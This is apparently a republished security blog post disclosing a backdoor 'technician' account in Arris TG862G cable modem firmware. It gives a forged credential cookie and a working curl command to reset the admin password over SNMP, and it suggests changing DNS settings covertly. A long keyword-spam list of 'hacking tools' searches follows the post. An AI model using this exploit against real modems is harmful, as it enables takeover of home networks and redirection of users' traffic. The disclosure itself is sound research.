Arris Cable Modem Backdoor - I'm A Technician, Trust Me.

Vendor backdoors are the worst. Sloppy coding leading to unintentional "bugdoors" is somewhat defendable, but flat out backdoors are always unacceptable. Todays example is brought to you by Arris. A great quote from their site -

Subscribers want their internet to be two things, fast and worry free. Cable operators deploy services to meet the speed expectations, and trust ARRIS to provide the cable modems that deliver the reliability.

Nothing spells "trust" and "worry free" like a backdoor account, right?! Anyways, the following was observed on an Arris TG862G cable modem running the following firmware version -TS070563_092012_MODEL_862_GW

After successfully providing the correct login and password to the modems administration page, the following cookie is set (client side):

Cookie: credential=eyJ2YWxpZCI6dHJ1ZSwidGVjaG5pY2lhbiI6ZmFsc2UsImNyZWRlbnRpYWwiOiJZV1J0YVc0NmNHRnpjM2R2Y21RPSIsInByaW1hcnlPbmx5IjpmYWxzZSwiYWNjZXNzIjp7IkFMTCI6dHJ1ZX0sIm5hbWUiOiJhZG1pbiJ9

 All requests must have a valid "credential" cookie set (this was not the case in a previous FW release - whoops) if the cookie is not present the modem will reply with "PLEASE LOGIN". The cookie value is just a base64 encoded json object:

{"valid":true,"technician":false,"credential":"YWRtaW46cGFzc3dvcmQ=","primaryOnly":false,"access":{"ALL":true},"name":"admin"}

And after base64 decoding the "credential" value we get:

{"valid":true,"technician":false,"credential":"admin:password","primaryOnly":false,"access":{"ALL":true},"name":"admin"}

Sweet, the device is sending your credentials on every authenticated request (without HTTPS), essentially they have created basic-auth 2.0 - As the kids say "YOLO". The part that stuck out to me is the "technician" value that is set to "false" - swapping it to "true" didn't do anything exciting, but after messing around a bit I found that the following worked wonderfully:

Cookie: credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9

Which decodes to the following:

{"credential":"dGVjaG5pY2lhbjo="}

And finally:

{"credential":"technician:"} 

Awesome, the username is "technician" and the password is empty. Trying to log into the interface using these credentials does not work :(

That is fairly odd. I can't think of a reasonable reason for a hidden account that is unable to log into the UI. So what exactly can you do with this account? Well, the web application is basically a html/js wrapper to some CGI that gets/sets SNMP values on the modem. It is worth noting that on previous FW revisions the CGI calls did NOT require any authentication and could be called without providing a valid "credential" cookie. That bug was killed a few years ago at HOPE 9.

Now we can resurrect the ability to set/get SNMP values by setting our "technician" account:

That's neat, but we would much rather be using the a fancy "web 2.0" UI that a normal user is accustomed to, instead of manually setting SNMP values like some sort of neckbearded unix admin. Taking a look at the password change functionality appeared to be a dead end as it requires the previous password to set a new one:

Surprisingly the application does check the value of the old password too! Back to digging around the following was observed in the "mib.js" file:

SysCfg.AdminPassword= new Scalar("AdminPassword","1.3.6.1.4.1.4115.1.20.1.1.5.1",4);

Appears that the OID "1.3.6.1.4.1.4115.1.20.1.1.5.1" holds the value of the "Admin" password! Using the "technician" account to get/walk this OID comes up with nothing:

HTTP/1.1 200 OK
Date: Tue, 23 Sep 2014 19:58:40 GMT
Server: lighttpd/1.4.26-devel-5842M
Content-Length: 55
{
"1.3.6.1.4.1.4115.1.20.1.1.5.1.0":"",
"1":"Finish"
}

What about setting a new value? Surely that will not work....

That response looks hopeful. We can now log in with the password "krad_password" for the "admin" user:

This functionality can be wrapped up in the following curl command:

curl -isk -X 'GET' -b 'credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9' 'http://192.168.100.1:8080/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.5.1.0=krad_password;4;'

Of course if you change the password you wouldn't be very sneaky, a better approach would be re-configuring the modems DNS settings perhaps? It's also worth noting that the SNMP set/get is CSRF'able if you were to catch a user who had recently logged into their modem.

The real pain here is that Arris keeps their FW locked up tightly and only allows Cable operators to download revisions/fixes/updates, so you are at the mercy of your Cable operator, even if Arris decides that its worth the time and effort to patch this bug backdoor - you as the end user CANNOT update your device because the interface doesn't provide that functionality to you! Next level engineering.

Related word

1. Hacker Tools 2020
2. Hacker Tools Free Download
3. Hack Tools Github
4. Pentest Tools For Ubuntu
5. Pentest Tools Download
6. Best Pentesting Tools 2018
7. Hacking Tools For Mac
8. Install Pentest Tools Ubuntu
9. Nsa Hacker Tools
10. Hack Tools For Games
11. Hacker Tool Kit
12. Hack Tool Apk
13. Hack Tools Github
14. Hacking Tools Mac
15. Tools 4 Hack
16. Hacker Tools 2019
17. Pentest Tools List
18. Hack Tools Mac
19. Hack Website Online Tool
20. Free Pentest Tools For Windows
21. Termux Hacking Tools 2019
22. Pentest Tools For Ubuntu
23. Hack Rom Tools
24. Hack Tools For Games
25. Pentest Tools Linux
26. Hackrf Tools
27. Install Pentest Tools Ubuntu
28. Kik Hack Tools
29. Pentest Tools Review
30. Hack Website Online Tool
31. New Hacker Tools
32. Termux Hacking Tools 2019
33. Pentest Tools Alternative
34. Github Hacking Tools
35. Hack Tools 2019
36. Easy Hack Tools
37. Hacker Tools For Ios
38. Hacker Tools Free
39. Pentest Tools Port Scanner
40. Hacker Tool Kit
41. Hacker Tools Apk
42. Hack Tools Pc
43. Hack Tools For Pc
44. Pentest Tools Nmap
45. Hacking Tools For Windows Free Download
46. Game Hacking
47. Pentest Tools For Ubuntu
48. Top Pentest Tools
49. Hacking Tools Pc
50. Hacker Tools Online
51. Hacking Tools Windows 10
52. Pentest Tools Website
53. Pentest Tools Windows
54. Pentest Tools Find Subdomains
55. Pentest Tools Website
56. Hack And Tools
57. Hacking Tools Mac
58. Hack Website Online Tool
59. Hack Tools Github
60. Hacker Security Tools
61. Pentest Tools Find Subdomains
62. Pentest Tools Apk
63. New Hacker Tools
64. Hacker Tools For Windows
65. Bluetooth Hacking Tools Kali
66. Pentest Tools Github
67. Pentest Tools Review
68. Hacker Tools Linux
69. Pentest Tools Subdomain
70. Hacker Tools Windows
71. Hacker Search Tools
72. Hacker Tools For Ios
73. Hacker Tools For Windows
74. Pentest Tools Bluekeep
75. Pentest Automation Tools
76. Hacking Tools For Kali Linux
77. Pentest Tools Nmap
78. Hack Tool Apk
79. Hack App
80. Hacking Tools Windows 10
81. Hacking Tools Download
82. Pentest Tools Open Source
83. Pentest Tools Free
84. Hacking Tools Usb
85. Pentest Tools For Android
86. Pentest Tools For Windows
87. Pentest Tools Windows
88. Hacking Tools For Games
89. Hacking Tools 2019
90. Hak5 Tools
91. Hack Tool Apk
92. Hacker Tools Hardware
93. Github Hacking Tools
94. Pentest Tools Apk
95. Hacker Tools Mac
96. Pentest Tools For Mac
97. Tools 4 Hack
98. Pentest Tools Port Scanner
99. Kik Hack Tools
100. Hacker Tool Kit
101. Hacker Security Tools
102. Hacking Apps
103. Game Hacking
104. Pentest Tools Alternative
105. What Are Hacking Tools
106. Beginner Hacker Tools
107. Hacking Tools Download
108. World No 1 Hacker Software
109. Hack And Tools
110. Pentest Tools Github
111. Hacking Tools For Beginners
112. Black Hat Hacker Tools
113. Pentest Tools For Windows
114. Hack Tools For Windows
115. Pentest Tools Website Vulnerability
116. Free Pentest Tools For Windows
117. Hacking Tools Software
118. How To Hack
119. Bluetooth Hacking Tools Kali
120. Blackhat Hacker Tools
121. Hack Rom Tools